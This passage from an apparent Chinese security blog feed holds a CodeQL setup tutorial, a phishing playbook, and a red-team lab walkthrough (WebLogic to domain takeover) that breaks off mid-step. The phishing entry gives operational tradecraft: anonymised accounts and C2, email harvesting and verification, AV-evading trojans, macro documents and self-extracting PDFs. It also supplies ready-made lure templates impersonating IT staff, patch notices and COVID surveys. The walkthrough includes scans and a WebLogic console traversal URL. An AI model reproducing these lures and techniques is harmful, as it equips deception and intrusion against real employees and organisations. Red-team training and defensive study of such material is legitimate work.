(本地保存文件的路径)</span><br></pre></td></tr></table></figure><p>学习文章</p><ul><li><a href="https://xz.aliyun.com/t/12921#toc-0">K8s集群安全攻防(上)</a> </li><li><a href="https://xz.aliyun.com/t/12930">K8s集群安全攻防(下)</a></li></ul>]]></content>
<summary type="html"><p>在安装完 K8s 后,默认会安装 etcd 组件,etcd 是一个高可用的 key-value 数据库,它为 k8s 集群提供底层数据存储,保存了整个集群的状态。大多数情形下,数据库中的内容没有加密,因此如果黑客拿下 etcd,就意味着能控制整个 K8s 集群。</p>
<</summary>
<category term="渗透测试" scheme="https://oceansec.github.io/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/"/>
<category term="云安全" scheme="https://oceansec.github.io/tags/%E4%BA%91%E5%AE%89%E5%85%A8/"/>
</entry>
<entry>
<title>初见codeql</title>
<link href="https://oceansec.github.io/2023/12/05/%E5%88%9D%E8%A7%81codeql/"/>
<id>https://oceansec.github.io/2023/12/05/%E5%88%9D%E8%A7%81codeql/</id>
<published>2023-12-05T03:10:27.000Z</published>
<updated>2023-12-05T03:13:03.188Z</updated>
<content type="html"><![CDATA[<h2 id="安装CodeQL"><a href="#安装CodeQL" class="headerlink" title="安装CodeQL"></a>安装CodeQL</h2><p>CodeQL本身包含两部分解析引擎+<code>SDK</code></p><ol><li><p>下载已经编译好的 CodeQL 执行程序</p><p><a href="https://github.com/github/codeql-cli-binaries/releases">https://github.com/github/codeql-cli-binaries/releases</a></p><p>下载之后配置环境变量</p></li><li><p>安装 SDK</p><p>CMD 进入 CodeQL 安装目录,使用 Git 安装 SDK</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git <span class="built_in">clone</span> https://github.com/Semmle/ql</span><br></pre></td></tr></table></figure></li><li><p>安装 VS Code 插件,在应用商店搜索 CodeQL,安装第一个</p><p><img src="/2023/12/05/%E5%88%9D%E8%A7%81codeql/image-20231204104312841.png" alt="image-20231204104312841"></p></li><li><p>安装之后配置 CodeQL 目录</p><p>点击插件右侧齿轮按钮,填入 CodeQL 的安装目录,路径中需要到 codeql.exe(下图没有会有bug)</p><p><img src="/2023/12/05/%E5%88%9D%E8%A7%81codeql/image-20231204104429485.png" alt="image-20231204104429485"></p></li><li><p>因为审计 Java 代码还需要用到 maven,需要安装 MVN</p><p>直接在官网下载:<a href="https://maven.apache.org/download.cgi%EF%BC%8C%E9%85%8D%E7%BD%AE%E5%A5%BD%E7%8E%AF%E5%A2%83%E5%8F%98%E9%87%8F%E5%8D%B3%E5%8F%AF%EF%BC%8C%E5%9C%A8">https://maven.apache.org/download.cgi,配置好环境变量即可,在</a> Windows 系统语言为中文的情况下,可能会出现报错中文乱码</p></li></ol><h2 id="简单使用"><a href="#简单使用" class="headerlink" title="简单使用"></a>简单使用</h2><p>由于<code>CodeQL</code>的处理对象并不是源码本身,而是中间生成的AST结构数据库,所以我们先需要把我们的项目源码转换成<code>CodeQL</code>能够识别的<code>CodeDatabase</code></p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">codeql database create ../codeqldatabase --language=<span class="string">"java"</span> --<span class="built_in">command</span>=<span class="string">"mvn clean install --file pom.xml"</span> --source-root=C:\Users\admin\Downloads\micro_service_seclab-main</span><br></pre></td></tr></table></figure><p><img src="/2023/12/05/%E5%88%9D%E8%A7%81codeql/image-20231204143940460.png" alt="image-20231204143940460"></p><p>导入 Database</p><p>在 vscode 中导入解析完成的数据库</p><p><img src="/2023/12/05/%E5%88%9D%E8%A7%81codeql/image-20231204143925694.png" alt="image-20231204143925694"></p><p>数据库加载成功</p><p><img src="/2023/12/05/%E5%88%9D%E8%A7%81codeql/image-20231204144132690.png" alt="image-20231204144132690"></p><p>编写测试 QL 查询,在 vscode 中打开 SDK 所在文件夹,如图所示目录新建 ql 文件,右击 run query 进行查询</p><p><img src="/2023/12/05/%E5%88%9D%E8%A7%81codeql/image-20231204144926981.png" alt="image-20231204144926981"></p><h2 id="基础语法"><a href="#基础语法" class="headerlink" title="基础语法"></a>基础语法</h2><p>CodeQL 的核心引擎是不开源的,这个核心引擎的作用之一是帮助我们把要审计的代码文件转换成CodeQL能识别的中间层 AST 数据库,然后我们需要编写 QL 查询语句来获取我们想要的数据,由于 CodeQL 开源了所有的规则和规则库部分,所以我们能够做的就是编写符合我们业务逻辑的 QL 规则,然后使用 CodeQL 引擎去跑我们的规则,发现靶场的安全漏洞</p><blockquote><p>什么是source和sink</p><p>在代码自动化安全审计的理论当中,有一个最核心的三元组概念,就是(source,sink和sanitizer)</p><ul><li>source是指漏洞污染链条的输入点。比如获取http请求的参数部分,就是非常明显的Source</li><li>sink是指漏洞污染链条的执行点,比如SQL注入漏洞,最终执行SQL语句的函数就是sink(这个函数可能叫query或者exeSql,或者其它)</li><li>sanitizer又叫净化函数,是指在整个的漏洞链条当中,如果存在一个方法阻断了整个传递链,那么这个方法就叫sanitizer</li></ul></blockquote><p>只有当 source 和 sink 同时存在,并且从 source 到 sink 的链路是通的,才表示当前漏洞是存在的</p><p>具体语法可以学习:<a href="https://www.freebuf.com/articles/web/283795.html">CodeQL从入门到放弃</a></p><h2 id="CodeQLpy"><a href="#CodeQLpy" class="headerlink" title="CodeQLpy"></a>CodeQLpy</h2><p><a href="https://github.com/webraybtl/CodeQLpy">CodeQLpy</a> 是一款基于 CodeQL 实现的自动化代码审计工具,目前仅支持java语言,后期会增加对其他语言的支持,支持对多种不同类型的java代码进行代码审计,包括jsp文件、SpringMVC的war包、SpringBoot的jar包、maven源代码</p><p>安装 CodeQL 之后,把 python 文件放到 CodeQL 目录下,安装依赖库</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">pip3 install -r requirements.txt</span><br></pre></td></tr></table></figure><p>然后需要进入config目录下修改ini配置,有空格需要加上引号</p><figure class="highlight ini"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="section">[codeql]</span></span><br><span class="line"><span class="attr">qlpath</span> = D:\_Tools\My_Safe_Tools\codeql\ql\java\ql\test</span><br><span class="line"><span class="attr">jdk8</span> = <span class="string">"C:\Program Files\Java\jdk1.8.0_152\bin\java.exe"</span></span><br><span class="line"><span class="attr">jdk11</span> = <span class="string">"C:\Program Files\Java\jdk-11\bin\java.exe"</span></span><br><span class="line"><span class="attr">idea_decode_tool</span> = lib/java-decompiler.jar</span><br><span class="line"><span class="attr">jd_decode_tool</span> = lib/jd-cli.jar</span><br><span class="line"><span class="attr">jsp_decode_tool</span> = lib/jsp2class.jar</span><br><span class="line"><span class="attr">ecj_tool</span> = lib/ecj-<span class="number">4.6</span>.<span class="number">1</span>.jar</span><br><span class="line"><span class="attr">tomcat_jar</span> = lib/tomcat_lib</span><br><span class="line"><span class="attr">spring_boot_jar</span> = lib/spring_boot_lib</span><br><span class="line"><span class="attr">decode_savedir</span> = out/decode/</span><br><span class="line"><span class="attr">general_dbpath</span> = out/database/</span><br><span class="line"><span class="attr">maven_savedir</span> = out/mvn/</span><br><span class="line"><span class="attr">decompile_type</span> = jd</span><br><span class="line"><span class="attr">debug</span> = <span class="literal">on</span></span><br><span class="line"><span class="attr">model</span> = fast</span><br><span class="line"><span class="attr">thread_num</span> = <span class="number">10</span></span><br><span class="line"></span><br><span class="line"><span class="section">[log]</span></span><br><span class="line"><span class="attr">path</span> = out/log/</span><br></pre></td></tr></table></figure><ol><li><p>生成数据库初始化</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">// -c 选项不加默认扫描java文件,加上即扫描class文件</span><br><span class="line">// -t参数表示目标源码的路径,支持的源码类型是文件夹,jar包和war包</span><br><span class="line">python3 main.py -t 指向要审计的项目</span><br></pre></td></tr></table></figure><p>运行之后,会在最后提示下一步要执行的命令</p><p><img src="/2023/12/05/%E5%88%9D%E8%A7%81codeql/image-20231204174207054.png" alt="image-20231204174207054"></p></li><li><p>生成数据库</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># windows</span></span><br><span class="line">codeql database create out/database/micro_service_seclab-main --language=java --source-root=<span class="string">"C:\Users\admin\Downloads\micro_service_seclab-main"</span> --<span class="built_in">command</span>=<span class="string">"D:\_Tools\My_Safe_Tools\codeql\CodeQLpy-master\out\decode/run.cmd"</span> --overwrite</span><br><span class="line"><span class="comment"># linux</span></span><br><span class="line">codeql database create out/database/SecExample-main --language=java --<span class="built_in">command</span>=<span class="string">"/bin/bash -c /Users/xxx/CodeQLpy/out/decode/run.sh"</span> --overwrite</span><br></pre></td></tr></table></figure><p><img src="/2023/12/05/%E5%88%9D%E8%A7%81codeql/image-20231204174521388.png" alt="image-20231204174521388"></p><p>运行之后生成数据库,如果有错请忽略,最终只要看到 Successfully created database 就可以</p></li><li><p>最后查询漏洞</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python main.py -d out/database/micro_service_seclab-main</span><br></pre></td></tr></table></figure><p>运行之后程序会使用自带的查询 ql 语句进行漏洞扫描,完成之后会自动生成 csv 文件</p><p><img src="/2023/12/05/%E5%88%9D%E8%A7%81codeql/image-20231205100612615.png" alt="image-20231205100612615"></p></li></ol><p>开源项目</p><ul><li><a href="https://github.com/ZhuriLab/Yi">项目监控工具 以及 Codeql 自动运行</a></li><li><a href="https://github.com/webraybtl/CodeQLpy">CodeQLpy</a></li></ul><p>参考文章</p><ol><li><a href="https://www.freebuf.com/articles/web/283795.html">CodeQL从入门到放弃</a></li><li><a href="https://mp.weixin.qq.com/s/iW7EGEAylqcltYgGo_KdvA">CodeQL与XRay联动实现黑白盒双重校验</a></li></ol>]]></content>
<summary type="html"><h2 id="安装CodeQL"><a href="#安装CodeQL" class="headerlink" title="安装CodeQL"></a>安装CodeQL</h2><p>CodeQL本身包含两部分解析引擎+<code>SDK</code></p>
<ol>
<l</summary>
</entry>
<entry>
<title>邮件钓鱼小总结</title>
<link href="https://oceansec.github.io/2023/12/05/%E9%82%AE%E4%BB%B6%E9%92%93%E9%B1%BC%E5%B0%8F%E6%80%BB%E7%BB%93/"/>
<id>https://oceansec.github.io/2023/12/05/%E9%82%AE%E4%BB%B6%E9%92%93%E9%B1%BC%E5%B0%8F%E6%80%BB%E7%BB%93/</id>
<published>2023-12-05T02:59:04.866Z</published>
<updated>2022-09-20T09:55:30.090Z</updated>
<content type="html"><![CDATA[<p><img src="https://s2.loli.net/2022/09/15/z7o8JmQqHZVhTsg.png" alt="img"></p><ol><li><p>事前准备</p><p>邮箱、微信号、脉脉账号、匿名手机号等等需要做到匿名,vps、c2 啥的需要注意是不是被标记</p><p>多个邮箱要经常着用,发多了被识别成垃圾邮件导致邮箱容易被封</p><p>提前设定模糊的人设,微信脉脉这种需要养号,可以定的高级点让人产生想点的欲望,建议每次 hw 换一下名字</p><p>最好是用 163 邮箱,然后改一下名字这样收到的比较正式</p><p><img src="https://s2.loli.net/2022/09/20/dp5mGBvue43V7oJ.png" alt="截屏2022-09-20 17.40.23"></p><p><img src="https://s2.loli.net/2022/09/20/KSsTcFiECBmeYUa.png" alt="截屏2022-09-20 17.41.09"></p></li><li><p>信息收集</p><ol><li><p>搜索引擎,微信公众号方面搜比较新的准确的信息,一般就是找招聘、招标,比如邮箱和电话</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">目标名字</span><br><span class="line">"XXXX" 联系方式</span><br><span class="line"> 投递简历</span><br><span class="line"> hr</span><br><span class="line"> 招聘</span><br><span class="line"> 应聘</span><br><span class="line"> 贷款</span><br><span class="line"> 手机号</span><br></pre></td></tr></table></figure></li><li><p>邮箱收集网站,用网站找邮箱存在的问题就是邮箱太多太旧没法准确定位到人</p><p><a href="http://www.skymem.info/">http://www.skymem.info/</a></p><p><a href="https://phonebook.cz/">https://phonebook.cz/</a></p><p>在收集邮箱之后,我们要对邮箱进行验证,因为有些邮箱目标企业人员已经放弃或不用(离职,职位调动等)</p><p><a href="https://mailtester.com/testmail.php">https://mailtester.com/testmail.php</a></p><p><a href="https://app.snov.io/verify/individual-emails">https://app.snov.io/verify/individual-emails</a></p><p>这款工具可以自动组合邮箱地址再根据组合的结果逐个验证</p><p><a href="https://github.com/angusluk/MailTester">https://github.com/angusluk/MailTester</a><br>在线客服 / hr / boss 直聘弄微信号</p></li><li><p>构造字典,很多企业邮箱都是姓名拼音@公司域名,用一些字典如:中国人姓名拼音、字母缩写top100,1000,10000,结合已有的信息,多一个邮箱就多一份成功率</p><p>这里可以配合这个网址 <a href="https://www.aies.cn/pinyin.htm">https://www.aies.cn/pinyin.htm</a> 根据收集到的目标信息制定对应人名字典进行组合</p></li></ol><p>可以把搜集到疑似网络管理员、运维人员、安全部门的人员提取出来,这些人单独写邮箱或者不发,因为这些人安全意识相对较高</p></li><li><p>生成木马,木马要做到最基本的几点</p><ol><li><p>免杀</p></li><li><p>结合收集信息去写木马文案</p><p>比如招聘就投个人简历</p></li><li><p>木马隐蔽性,如:pdf 自解压释放实现</p></li></ol></li><li><p>发送钓鱼</p><ol><li>钓鱼平台大批量发送,不知道内容问题还是 hw 期间比较严,上线率不高</li><li>邮箱单钓,即使是单钓也不能给一个目标发很多,总有安全意识高,内容要结合邮箱来源</li><li>即时通讯软件钓鱼,最好结合打点获得的精准数据,找合适的理由</li></ol></li><li><p>上线 c2/cs</p><ol><li>上线时微信通知</li><li>一键持久化</li><li>证书名区分钓鱼目标,方便管理</li><li>定时查看 ip 是不是被标记或有相关情报</li></ol></li></ol><p>注意点:</p><p>钓鱼邮件啥的发送时间需要特别注意,钓鱼不像打点可以24H,需要根据目标单位员工上下班和午休时间相关联,最好是上午发这样时间比较充足</p><p>成功率比较高的几种方式:</p><ol><li>结合已有的系统如:oa 里边的个人信息加微信钓</li><li>最近新出招聘投简历</li><li>找客服投问题</li></ol><p>遇到的问题有些人安全意识比较高或者公司规定只接收 pdf 或者 word 文件,就需要其他的马</p><ol><li>免杀 pdf 捆绑自解压</li><li>结合漏洞钓鱼,coremail、wps、office</li></ol><p><strong>其他文章</strong></p><p><a href="https://mp.weixin.qq.com/s/aatNjey3swZz7T4Yw_LqsQ">红队测试之邮箱打点</a></p><p><a href="https://xz.aliyun.com/t/10731">https://xz.aliyun.com/t/10731</a></p><p><a href="https://mp.weixin.qq.com/s/ZptprvkNXRP0PNpmoXpbFg">Macos钓鱼上线CS踩坑流程</a></p><h2 id="钓鱼模版"><a href="#钓鱼模版" class="headerlink" title="钓鱼模版"></a>钓鱼模版</h2><p>一些网上收集的钓鱼模版</p><p>重置密码</p><p>攻击者伪装成管理员,让受害者点击钓鱼邮件中的链接来修改各种各样的密码!如下:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">xxx,您好</span><br><span class="line"> 我是xx部门的信息,我的oa系统账号密码忘记了,麻烦帮我重置一下我的oa帐号密码,然后将新的账号密码发到这个邮箱,十分感谢!</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">大家好:</span><br><span class="line"> 近期由于我们公司的邮箱密码泄露,为防止不法分子利用,影响到我们的数据安全,各位员工的密码均需要及时更新修改,在收到邮件的第一时间,请登录如下平台,立即修改自己邮箱的账号密码。</span><br></pre></td></tr></table></figure><p>账号解冻</p><p>攻击者伪装成系统管理员,让受害者点击钓鱼邮件中的链接解冻账号</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">您好!</span><br><span class="line"> 上网行为管理近几日发现您的账号存在异常行为,为了防止您的账号被不法分子盗取,我们暂时将您的账号进行了冻结,如果不是您本人的操作的话,可以点击下面的链接进行解冻。</span><br></pre></td></tr></table></figure><p>升级补丁</p><p>攻击者伪装成系统管理员,让受害者点击钓鱼邮件中的附件 升级补丁。</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">各位同事,大家好!</span><br><span class="line"> 近日微软发布了本月安全更新补丁,其中包含一个RDP(远程桌面服务)远程代码执行漏洞的补丁更新,对应CVE编号为CVE-2019-0708,现需要所有员工的电脑都打上补丁,漏洞补丁直接下载附件即可</span><br></pre></td></tr></table></figure><p>信息收集</p><p>利用疫情,让受害者点击钓鱼邮件中的链接反馈相关信息。</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">各位同事,大家好:</span><br><span class="line">近日,在xx的来往人员中进行核算检查时,又发现了核酸检测呈阳性的人员。</span><br><span class="line"> 为了更好的配合政府的疫情防控工作的顺利展开,我们公司主动承担了内部人员的信息收集工作,需要员工填写一些个人基本信息、核酸检测信息、行程信息等信息。 </span><br><span class="line">可以扫描二维码填写基本信息</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">各位同事,大家好:</span><br><span class="line"> 为落实“xx市疫情防控策略”的工作要求,推进疫情防控相关的数据共享,提升排查效率。我司开发人员设计出一个“疫情防控信息公示系统”,将个人基本信息,行程信息,温度信息,是否打疫苗等相关信息整合到一个公示平台之上,员工可以在线查看有关信息,享受”一站式”服务,同时推进疫情防控工作的展开。</span><br><span class="line">目前该系统处于推广阶段,开发人员将根据用户体验,不断优化业务流程,继续完善平台共功能,欢迎各位领导、同事提出宝贵意见。</span><br><span class="line">平台网址:http:xx.xx.com</span><br></pre></td></tr></table></figure><p>节假日礼包</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">各位同事好: </span><br><span class="line"> 春节临近,旧的一年即将过去,崭新的一年即将到来,我们将为各位员工准备春节大礼包,现在需要填写一下家庭住址等基本信息</span><br></pre></td></tr></table></figure><p>简历模板</p><figure class="highlight makefile"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="section">攻击手段:根据招聘信息对招聘邮箱进行钓鱼邮件攻击,发送带有宏代码的简历文档,及免杀exe程序</span></span><br><span class="line"></span><br><span class="line"><span class="section">邮件模板:</span></span><br><span class="line"><span class="section">您好:</span></span><br><span class="line">看到贵公司官网在招聘产品开发岗,本人7年金融证券相关产品开发经验,具有较为丰富的项目经验,主要擅长Java,C++等语言,附件是本人开发的作品及个人简历,还请贵司查看,期待您的回信,谢谢。</span><br></pre></td></tr></table></figure><p>合作模板</p><figure class="highlight makefile"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="section">攻击手段:</span></span><br><span class="line">根据官网搜集到公司的业务功能、合作的企业信息及联系方式</span><br><span class="line">发送钓鱼邮件附件为带有office宏攻击代码的word文档。</span><br><span class="line"></span><br><span class="line"><span class="section">邮件模板:</span></span><br><span class="line">xxx公司您好:</span><br><span class="line">我是xxx公司市场营销部的xxx,我在贵公司官网上了解到贵方有提供xxx业务服务(或经xxx合作商推荐)。满足本公司的项目需求,故有合作意向,以下为本公司的项目合作意向书,请查阅,希望能与贵方合作共赢!</span><br></pre></td></tr></table></figure><p>投诉邮件</p><figure class="highlight makefile"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="section">攻击手段: </span></span><br><span class="line">根据官网搜集到目标咨询及投诉渠道获取邮箱账号。</span><br><span class="line">发送钓鱼邮件附件为带有office宏攻击代码的word文档。</span><br><span class="line"></span><br><span class="line"><span class="section">邮件模板:</span></span><br><span class="line"><span class="section">xxx银行您好:</span></span><br><span class="line">我是贵方银行的用户,我于x月x日与行方在线客户进行业务咨询,但是编号xxx客服服务态度恶劣且怠慢,非但没能解决我的问题,还给我带来了很不好的用户体验。相关聊天记已记录在文档里,请行内人员尽快给一个处理的结果。</span><br></pre></td></tr></table></figure><p>官方通告</p><p><img src="https://s2.loli.net/2022/09/15/uzC7M8SspafrZtO.png" alt="img"></p><p><img src="https://s2.loli.net/2022/09/15/4eImFu7dQBhVYyW.jpg" alt="2021-07-15-12-56-09"></p><p><img src="https://s2.loli.net/2022/09/15/1qf49GYuLpDhA6B.png" alt="img"></p><p>其他的一些网站</p><p>邮箱收集</p><p>官网找的邮箱适合精准钓鱼,资源列表里的邮箱每个邮箱只发几封防止被封</p><p><a href="https://hunter.io/">https://hunter.io/</a></p><p><a href="http://www.skymem.info/">http://www.skymem.info/</a></p><p><a href="https://phonebook.cz/">https://phonebook.cz/</a></p><p><a href="https://www.email-format.com/i/search/">https://www.email-format.com/i/search/</a></p><p><a href="https://github.com/bit4woo/teemo">https://github.com/bit4woo/teemo</a></p><p><a href="https://github.com/laramies/theHarvester">https://github.com/laramies/theHarvester</a></p><p>在线发送邮件:</p><p><a href="https://link.zhihu.com/?target=https://emkei.cz/?reCAPTCHAv2">https://emkei.cz/?reCAPTCHAv2</a></p><p><a href="https://link.zhihu.com/?target=http://tool.chacuo.net/mailanonymous">http://tool.chacuo.net/mailanonymous</a></p><p><a href="https://link.zhihu.com/?target=https://ihuan.me/mail">https://ihuan.me/mail</a></p><p><a href="https://link.zhihu.com/?target=http://deadfake.com/Send.aspx">http://deadfake.com/Send.aspx</a></p><p>临时邮箱</p><p><a href="https://link.zhihu.com/?target=http://24mail.chacuo.net/">http://24mail.chacuo.net/</a></p><p><a href="https://link.zhihu.com/?target=https://10minutemail.net/">https://10minutemail.net/</a></p><p><a href="https://link.zhihu.com/?target=http://www.linshiyouxiang.net/">http://www.linshiyouxiang.net/</a></p>]]></content>
<summary type="html"><p><img src="https://s2.loli.net/2022/09/15/z7o8JmQqHZVhTsg.png" alt="img"></p>
<ol>
<li><p>事前准备</p>
<p>邮箱、微信号、脉脉账号、匿名手机号等等需要做到匿名,vps、c2 啥的需</summary>
<category term="社工" scheme="https://oceansec.github.io/categories/%E7%A4%BE%E5%B7%A5/"/>
<category term="钓鱼" scheme="https://oceansec.github.io/tags/%E9%92%93%E9%B1%BC/"/>
</entry>
<entry>
<title>漏洞靶场实战-红队靶场从外网 Weblogic 打进内网,再到约束委派接管域控</title>
<link href="https://oceansec.github.io/2023/12/05/%E6%BC%8F%E6%B4%9E%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%88%98-%E7%BA%A2%E9%98%9F%E9%9D%B6%E5%9C%BA%E4%BB%8E%E5%A4%96%E7%BD%91%20Weblogic%20%E6%89%93%E8%BF%9B%E5%86%85%E7%BD%91%EF%BC%8C%E5%86%8D%E5%88%B0%E7%BA%A6%E6%9D%9F%E5%A7%94%E6%B4%BE%E6%8E%A5%E7%AE%A1%E5%9F%9F%E6%8E%A7/"/>
<id>https://oceansec.github.io/2023/12/05/%E6%BC%8F%E6%B4%9E%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%88%98-%E7%BA%A2%E9%98%9F%E9%9D%B6%E5%9C%BA%E4%BB%8E%E5%A4%96%E7%BD%91%20Weblogic%20%E6%89%93%E8%BF%9B%E5%86%85%E7%BD%91%EF%BC%8C%E5%86%8D%E5%88%B0%E7%BA%A6%E6%9D%9F%E5%A7%94%E6%B4%BE%E6%8E%A5%E7%AE%A1%E5%9F%9F%E6%8E%A7/</id>
<published>2023-12-05T02:59:04.864Z</published>
<updated>2022-08-26T13:23:56.410Z</updated>
<content type="html"><![CDATA[<p><img src="https://img-blog.csdnimg.cn/f0d15dfa21d24dc0a4b7475c382a9706.png"><br>从外网 Weblogic 打进内网,再到约束委派接管域控</p><p>靶场来自渗透攻击红队,官方 wp 及下载地址:<a href="https://mp.weixin.qq.com/s/dcYbIfLwN-Aw0Z9XxQSGkQ">https://mp.weixin.qq.com/s/dcYbIfLwN-Aw0Z9XxQSGkQ</a></p><p>本靶场存在的漏洞:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">GPP:admin:admin!@#45</span><br><span class="line">存在 GPP 漏洞</span><br><span class="line">存在 MS14-068</span><br><span class="line">存在 CVE-2020-1472</span><br><span class="line">Exchange 各种漏洞都可尝试</span><br><span class="line">可尝试非约束委派</span><br><span class="line">可尝试约束委派</span><br><span class="line">存在 CVE-2019-1388</span><br><span class="line">存在 CVE-2019-0708</span><br></pre></td></tr></table></figure><h2 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h2><p>虚拟机文件比较大,解压之后有 74.8G,所以要保证有足够的空间,建议使用固态硬盘,解压之后直接使用 VMware 扫描虚拟机并依次获取权限</p><p><img src="https://img-blog.csdnimg.cn/img_convert/58db02a27121d3854e41dda3f6774996.png" alt="image-20220507102253091"></p><p>网站拓扑</p><p><img src="https://img-blog.csdnimg.cn/img_convert/c2dac37a42c41c0cdf57d09402647c16.png" alt="图片"></p><p>更新一下上图的环境</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">网关 IP:192.168.43.252</span><br><span class="line">Kali IP:192.168.43.58</span><br><span class="line">Windows 11 hacker IP:192.168.43.166</span><br><span class="line">Windows 2012 IP:192.168.43.92</span><br></pre></td></tr></table></figure><p>发现 Windows 可以 ping 通 Kali,但是 kali 却 ping 不通,很容易想到是 Windows 的防火墙问题,关掉即可</p><p>还需要注意一个问题,这里选择的是桥接模式,之前都是 nat,其实用哪一种都行</p><p><img src="https://img-blog.csdnimg.cn/img_convert/da7162af67bf32ef042224bd9c63a95f.png" alt="image-20220507144405849"></p><p>这个图就很好地说明了之前的区别,就是使用 nat 模式的物理机是可以访问所有虚拟机的但是虚拟机无法访问物理机,使用桥接就可以相互访问,还有说如果是需要认证的校园网大概率用户不了桥接模式(虚拟机没法联网)</p><p>靶机一的 weblogic 需要手动开启</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">weblogic 安装目录:C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain(手动运行下 startWebLogic.cmd)</span><br></pre></td></tr></table></figure><h2 id="1-外网打点"><a href="#1-外网打点" class="headerlink" title="1.外网打点"></a>1.外网打点</h2><p>目标 IP:192.168.43.92</p><p>使用 nmap 进行端口扫描服务发现</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -sV -sT -Pn 192.168.43.92</span><br></pre></td></tr></table></figure><p>在一般实战中建议制定端口扫描,因为速度快且扫描精度高</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -v -Pn -T3 -sV -n -sT --open -p 22,1222,2222,22345,23,21,445,135,139,5985,2121,3389,13389,6379,4505,1433,3306,5000,5236,5900,5432,1521,1099,53,995,8140,993,465,878,7001,389,902,1194,1080,88 192.168.43.92</span><br></pre></td></tr></table></figure><p><img src="https://img-blog.csdnimg.cn/img_convert/73736d8709b4fbba06cac2ad68693ef3.png" alt="image-20220507152533105"></p><p>发现开放了 7001 端口,即 weblogic 服务</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.43.92:7001/console/login/LoginForm.jsp</span><br></pre></td></tr></table></figure><p><img src="https://img-blog.csdnimg.cn/img_convert/139a694f259d70647dc457b13c998754.png" alt="image-20220507150339521"></p><p>利用工具<a href="/console/css/%252e%252e%252fconsole.portal">下载</a>,过于脚本小子了</p><p><img src="https://img-blog.csdnimg.cn/img_convert/45f89c7633482fe0104819179880321d.png" alt="image-20220507152649200"></p><p>执行命令发现是 administrator 权限,并且可以连通外网</p><p><img src="https://img-blog.csdnimg.cn/img_convert/1525634f203e6830fcfd04fd6221f8cc.png" alt="image-20220507152734392"></p><h2 id="2-上线-CS"><a href="#2-上线-CS" class="headerlink" title="2.上线 CS"></a>2.上线 CS</h2><p>直接执行 Powershell 命令上线 